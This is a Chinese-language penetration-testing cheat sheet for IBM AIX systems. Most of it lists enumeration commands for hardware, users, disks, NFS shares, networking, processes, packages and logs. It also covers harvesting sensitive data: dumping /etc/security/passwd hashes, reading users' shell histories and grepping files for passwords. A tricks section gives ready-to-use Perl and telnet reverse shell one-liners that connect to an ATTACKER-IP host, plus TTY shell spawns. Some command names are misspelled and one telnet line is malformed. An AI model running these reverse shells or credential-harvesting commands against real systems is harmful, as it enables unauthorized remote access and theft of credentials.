MENU

AIX Pentest

September 24, 2017 • Security

0x01 前言

AIX(Advanced Interactive eXecutive)是IBM基于AT&T Unix System V开发的一套类UNIX操作系统。AIX在version 3之前的默认Shell为[Bourne shell]1,version 3之后变成了[Korn shell]2。AIX系统和其他Unix系统的一些命令出入较大。

0x02 基本信息获取

大部分基本的Unix命令都适用于AIX系统,比如导航,目录,进程,文件处理,搜索以及grep等等。基本信息获取分为如下几个部分:

  • 系统信息
  • 用户和组
  • 驱动和共享
  • 网络信息
  • 进程信息
  • 软件/包
  • 配置和杂项

1.系统信息

prtconf:输出系统配置信息,如:架构、处理器、内存、网络和存储信息等。

uname -a:输出操作系统信息,如:系统名、版本、主机名、发行号、设备ID等。

uname -x:输出局域网编号以及-a-l选项输出的信息。

uname -M:输出系统模型。

uname -u:输出系统ID及序列号。

oslevel -s:输出AIX版本信息,如:5300-06-08-0831,其中第一组数字5300为发行版本AIX5.3;第二组数字06Technology Level信息TL06;第三组数字08Service Pack信息SP08;第四组数字0831为发行版发布时间8月31日。

lscfg -p:输出已安装资源的列表。

lsdev -C | sort -d:输出该服务器已有的硬件列表。

lssrc -a:输出该服务器上所有的系统资源列表。

2.用户/组&用户管理

id:输出当前用户的信息及组信息。

who -a / w / last -a:输出已登录用户信息。

cat /etc/passwd:输出所有用户列表,如其他Unix系统下的/etc/passwd

lsuser ALL:输出所有用户及他们的属性列表。

cat /etc/group:输出所有组的列表,如其他Unix系统下的/etc/group

lsgroup ALL:输出所有组的列表及组的属性,包括组成员。

cat /etc/security/passwd:输出所有用户密码Hash列表,需要root权限。AIX系统的用户的密码Hash文件存放位置与一般Unix系统路径/etc/shadows不同,且Hash值的存储格式也与其他Unix系统不同。

mkuer:创建用户。

chuser:修改用户。

rmuser:删除用户。

lsuer ALL:更改用户的Shell。

chuser login=false:锁定用户账户。

3.驱动和共享

lspv:输出该服务器上的所有磁盘列表,如:hdisk1 004ce4cf0ff6d5c6 rootvg active hdisk2 00c9b8fa3120beb9 datavg active,其中系统有两块磁盘并被分配到了两块卷组rootvgdatavgrootvg是AIX安装的地方,所以每个AIX系统都存在rootvg,并且它是系统启动的地方。

lspv hdisk0:输出某个特定磁盘的信息。

lsvg:输出所有卷组的列表,一个卷组(Volume Group)就是一个可以包含一个可以包含一个或者多个磁盘或者逻辑单元号(LUNs)的本地磁盘。

lsvg -l rootvg:输出某个特定卷组的信息。

mount:输出所有已安装的文件系统的信息。

df -k / df -h:输出已挂载文件系统的信息,如:磁盘使用情况、挂载位置等。

lsps -a:输出分页的空间信息。

lslpp -L | grep nfs:检查NFS是否安装。

lssrc -g nfs | grep active:检查NFS/NIS的状态。

cat /etc/xtab:检查是否NFS服务器以及导出哪些目录。

showmount:显示导出NFS目录的主机。

showmount –e:显示导出哪些目录。

4.网络信息

ifconfig -a:输出该服务器的网络接口信息。

lsdev -Cc if:输出该服务器网络接口的硬件信息。

netstat -i:输出所有网络接口的表。

netstat -nr:输出服务器的路由表。

arp -a:输出服务器的arp缓存表。

namerslv -Is:输出该服务器所有可用的域名服务器列表。

hostent -S:输出该服务器上的所有主机条目列表。

grep 80 /etc/services:输出某个正在运行的服务的相关信息。

5.进程信息

ps aux:输出正在运行的进程信息。

who -p /var/adm/wtmp:输出已登录到服务器的用户的进程信息。

6.软件/包

echo $PATH:输出当前用户的PATH环境变量。

whereis ‘program’:定位服务器上某个特定的程序。

which ‘program’:定位服务器上某个特定的程序,只在当前用户的PATH环境变量中的路径进行搜索。

lslpp -L:输出服务器上所有已安装的软件列表。

lslpp -h:输出服务器上的历史软件列表。

lslpp -L | grep ‘program’:在服务器的所有软件列表中搜索指定程序。

rpm -qa:输出所有已安装的rpm包列表。

rpm -qa | grep 'package':在所有已安装的rpm包列表中搜索指定程序。

ls -l /usr/bin:列出/usr/bin目录下的文件。

7.配置和杂项

配置文件:/etc目录,用户home目录,.ssh目录,命令:ls -l /etcls -lR /etc/ | grep "conf"ls -lR /path/to/somewhere/ | grep "config"

用户活动:cat /home/USER/.sh_historycat /home/USER/.vi_historycat /home/USER/.profilegrep ^sh /home/*/.*hist*grep ^ssh /home/*/.*hist*grep ^telnet /home/*/.*hist*ls -lR /path/to/somewhere/ | grep "\.sh"

Cronjob:crontab -lcat /var/spool/cron/crontabscat /var/adm/cron/logcat /var/adm/cron/cron.denycat /var/adm/cron/cron.allow

日志:ls /var/log/ls /var/adm、cat /var/log/messagescat /var/adm/messagescat /var/adm/ras/errlogalog -L(列出所有可访问日志)、alog -o -t LOG(查看某个特定日志)、alog -o -t boot(查看系统启动日志)、errpt | head(查看系统最近的错误日志)

归档文件:ls -lR /path/to/somewhere/ | grep "\.tar"ls -lR /path/to/somewhere/ | grep "\.gz"ls -lR /path/to/somewhere/ | grep "\.a"

敏感文件:SUID/SGID/SETUID/SETGID目录、包含相关字符(password)的文件、/tmp目录,命令:find / -user root -perm -4000 -print 2>/dev/nullfind / -perm -1000 -print 2>/dev/nullfind / -perm -2000 -print 2>/dev/nullfind / -perm -3000 -print 2>/dev/nullgrep -rnw /path/to/somewhere/ -e "password"ls -la /tmp

0x03 技巧

1.配置和服务

查看服务器的配置和服务,如:

  • 21:FTP
  • 22:SSH
  • 23:Telnet
  • 512:rexec
  • 513:rlogin
  • 80,443:web

等等...

2.反弹Shell

Perl:

/usr/bin/perl -e 'use Socket;$i="ATTACKER-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};

Telnet:

telnet ATTACKER-IP 80 | /bin/sh | LOCAL-IP 44445telnet ATTACKING-IP 80 | /bin/sh | telnet ATTACKING-IP 443

等等...

3.TTY Shells

/bin/sh:/bin/sh -i

Perl:perl -e 'exec "/bin/sh";'perl: exec "/bin/sh";

等等...

4.文件下载

  • FTP
  • SCP
  • Telnet
  • Perl

等等...

5.权限提升

searchsploit_AIX_privesc.png

6.密码破解

0x04 参考

Archives QR Code
QR Code for this page
Tipping QR Code